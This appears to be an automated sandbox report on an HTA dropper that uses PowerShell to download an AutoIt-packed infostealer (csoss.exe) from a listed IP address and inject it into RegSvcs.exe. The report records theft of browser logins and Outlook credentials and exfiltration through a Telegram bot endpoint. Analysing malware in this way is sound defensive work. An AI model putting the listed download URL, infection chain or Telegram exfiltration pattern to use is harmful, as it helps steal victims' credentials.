                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_001E4E87
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001F1E06 GetUserNameW,6_2_001F1E06
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_001E3F3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001B49A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: csoss.exeBinary or memory string: WIN_81
                    Source: csoss.exeBinary or memory string: WIN_XP
                    Source: csoss.exeBinary or memory string: WIN_XPe
                    Source: csoss.exeBinary or memory string: WIN_VISTA
                    Source: csoss.exeBinary or memory string: WIN_7
                    Source: csoss.exeBinary or memory string: WIN_8
                    Source: csoss[1].exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2506031760.0000000002305000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00226283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00226283
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00226747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00226747

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		12
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		121
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell                    		Logon Script (Windows)2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares11
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS128
                    System Information Discovery                    		Distributed Component Object Model121
                    Input Capture                    		23
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets331
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials21
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640149 Sample: needagoodplanforsuccesstoge... Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 45 reallyfreegeoip.org 2->45 47 checkip.dyndns.org 2->47 49 checkip.dyndns.com 2->49 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 67 13 other signatures 2->67 10 mshta.exe 1 2->10         started        signatures3 65 Tries to detect the country of the analysis system (by using the IP) 45->65 process4 signatures5 77 Suspicious command line found 10->77 79 PowerShell case anomaly found 10->79 13 cmd.exe 1 10->13         started        process6 signatures7 81 Detected Cobalt Strike Beacon 13->81 83 Suspicious powershell command line found 13->83 85 PowerShell case anomaly found 13->85 16 powershell.exe 45 13->16         started        21 conhost.exe 13->21         started        process8 dnsIp9 43 23.95.235.28, 49724, 80 AS-COLOCROSSINGUS United States 16->43 35 C:\Users\user\AppData\Roaming\csoss.exe, PE32 16->35 dropped 37 C:\Users\user\AppData\Local\...\csoss[1].exe, PE32 16->37 dropped 39 C:\Users\user\AppData\...\dkgvurtz.cmdline, Unicode 16->39 dropped 55 Loading BitLocker PowerShell Module 16->55 57 Powershell drops PE file 16->57 23 csoss.exe 2 16->23         started        26 csc.exe 3 16->26         started        file10 signatures11 process12 file13 69 Antivirus detection for dropped file 23->69 71 Multi AV Scanner detection for dropped file 23->71 73 Binary is likely a compiled AutoIt script file 23->73 75 4 other signatures 23->75 29 RegSvcs.exe 15 2 23->29         started        41 C:\Users\user\AppData\Local\...\dkgvurtz.dll, PE32 26->41 dropped 33 cvtres.exe 1 26->33         started        signatures14 process15 dnsIp16 51 checkip.dyndns.com 193.122.130.0, 49725, 80 ORACLE-BMC-31898US United States 29->51 53 reallyfreegeoip.org 104.21.96.1, 443, 49726 CLOUDFLARENETUS United States 29->53 87 Tries to steal Mail credentials (via file / registry access) 29->87 89 Tries to harvest and steal browser information (history, passwords, etc) 29->89 signatures17

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    needagoodplanforsuccesstogetbackbest.hta47%VirustotalBrowse
                    needagoodplanforsuccesstogetbackbest.hta28%ReversingLabsScript-WScript.Trojan.Asthma

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\csoss.exe100%AviraTR/AD.SnakeStealer.ergur
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe100%AviraTR/AD.SnakeStealer.ergur
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe83%ReversingLabsWin32.Trojan.AutoitInject
                    C:\Users\user\AppData\Roaming\csoss.exe83%ReversingLabsWin32.Trojan.AutoitInject

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://23.95.235.28/110/csoss.exe$0%Avira URL Cloudsafe
                    http://23.95.235.28/110/csoss.exe0%Avira URL Cloudsafe
                    http://23.95.235.28/110/csoss.exev0%Avira URL Cloudsafe
                    http://checkip.dyndns.com0nu0%Avira URL Cloudsafe
                    http://23.95.235.28/110/csoss.ex0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		104.21.96.1
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		193.122.130.0
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              http://23.95.235.28/110/csoss.exetrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.microsoftpowershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://reallyfreegeoip.orgdRegSvcs.exe, 00000007.00000002.2506031760.000000000227D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://checkip.dyndns.orgRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.000000000224E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://23.95.235.28/110/csoss.exevpowershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.com0nuRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://reallyfreegeoip.org/xml/8.46.123.189lRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crl.micropowershell.exe, 00000003.00000002.1398726052.0000000007300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://23.95.235.28/110/csoss.exe$powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://checkip.dyndns.comdRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1394587679.0000000004C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ion=v4.5powershell.exe, 00000003.00000002.1393474414.0000000002D26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.org/qcsoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reallyfreegeoip.org/xml/8.46.123.189dRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2506031760.000000000227D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://checkip.dyndns.orgdRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://23.95.235.28/110/csoss.expowershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://checkip.dyndns.org/dRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1394587679.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.00000000021E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://api.telegram.org/bot-/sendDocument?chat_id=csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      		high
